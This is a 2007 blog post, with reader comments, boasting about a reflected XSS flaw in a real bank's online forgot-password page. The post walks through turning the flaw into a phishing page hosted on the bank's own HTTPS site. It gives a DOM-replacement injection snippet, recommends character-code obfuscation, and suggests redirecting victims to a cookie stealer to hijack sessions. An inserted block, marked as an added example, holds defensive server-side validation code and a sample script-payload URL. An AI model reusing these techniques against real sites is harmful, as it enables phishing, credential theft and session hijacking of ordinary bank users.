Rob Maybank2u with javascript

September 5th, 2007 | by tk2

I’m back. Now with another evil plan in mind. *grin*

I found an XSS hole in Maybank2u online, right in the HTTPS-secured section. It seems that Maybank2u uses JavaScript to validate and filter user input on the forgot-password page before echoing it back. Because that check runs only in the browser, it is easily evaded by sending the input not through the textbox but straight into the URL bar. As a result, a user can inject JavaScript code into the page by changing the birthday date value. Funny, isn’t it?
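The check that would have closed the hole described above, as an added example that is not part of the original post: a Node.js-style handler (hypothetical names, no framework) that re-validates the date-of-birth parameter on the server and HTML-encodes it on output, beside the vulnerable version that simply trusts the browser-side check. The URL, parameter name and date format are constructed for the example.

```javascript
// Added example, not code from the original post or from Maybank2u.
// Shows why browser-side validation of the birthday field cannot stop
// reflected XSS, and what a server-side fix looks like. All names are hypothetical.

// Minimal query-string parser: this is the raw value the server receives,
// whether or not the page's JavaScript validated the textbox.
function parseQuery(url) {
  const params = {};
  const qs = url.split("?")[1] || "";
  for (const pair of qs.split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? "" : pair.slice(i + 1);
    params[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, " "));
  }
  return params;
}

// Vulnerable rendering: assumes the browser already checked the value and
// writes it straight into the page, so anything from the URL bar is reflected.
function renderVulnerable(params) {
  return `<input name="dob" value="${params.dob}">`;
}

// Server-side allow-list check: a date of birth is dd/mm/yyyy (constructed format).
function isValidDate(s) {
  return /^\d{2}\/\d{2}\/\d{4}$/.test(String(s));
}

// Output encoding for the HTML attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened rendering: reject anything that is not a date, and encode on output
// anyway so the attribute cannot be broken out of even if the check changes.
function renderHardened(params) {
  const dob = isValidDate(params.dob) ? params.dob : "";
  return `<input name="dob" value="${escapeHtml(dob)}">`;
}

// Constructed sample: the value arrives via the URL, bypassing the textbox.
const sampleUrl = "https://bank.example/forgot?dob=%22%3E%3Cscript%3Ealert(1)%3C/script%3E";
const reflected = renderVulnerable(parseQuery(sampleUrl)); // contains a live <script>
const safe = renderHardened(parseQuery(sampleUrl));        // script never reaches the page
```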

[Screenshot: XSS in maybank2u online POC]

What can we do with an XSSed site? It’s an online banking site, dude, so why not set up a phishing site right there?

First we need to remove the old content [the forgot-password form] using getElementsByTagName. Fire up the DOM Inspector in Firefox and you should find that the form is in the 4th table. Replace the form’s HTML through the innerHTML property. The whole code that we’re going to inject should look something like this:

oldcontent = document.getElementsByTagName("table")[3];
oldcontent.innerHTML = '<-- phishing code goes here -->';

Convert the string to character codes with String.fromCharCode.


Yatta! A new phishing site hosted by maybank2u itself, at zero cost, and it’s HTTPS verified. [Tested only in Firefox]

[Screenshot: maybank2u https]

The downside is that the URL is obviously long. Notice that the login form is just an image. I’m lazy; it would be better to copy the HTML code from the real page. Keep in mind that the longer your phishing code, the longer the URL will be.

If you don’t want to create a phishing site, you can just redirect the victim to a cookie stealer. Set the cookie in your browser and you’ll have 10 minutes of login time.

Maybank users, you don’t have to worry, since any money transaction needs a TAC code. I told you earlier this is just a proof of concept. Haha.

This article is for educational purposes only. Whatever you do, you’re on your own.
To Mr. Fark: This is the better way to phish. Not the lame way that you did last time.

3 Responses to “Rob Maybank2u with javascript”

By anonymous on Sep 18, 2007 | Reply

    Nice finding, but remember posting this stuff on the net might create problems for you, because someone might try to use this trick on a user and in case it works the user will sue Maybank and you will be caught for starting this off even though you have a disclaimer at the bottom. Why take the risk?
    TC

By tk2 on Sep 19, 2007 | Reply

    someone already did
    http://www.blogeek.net/2007/07/23/it-sucks-being-a-noob/

By phyzhoe on Sep 23, 2007 | Reply

    Yea, it’s for educational purposes only.. Maybe Maybank will upgrade their security after this!! Newbs, don’t try this at home. hehe. BTW very nice POC
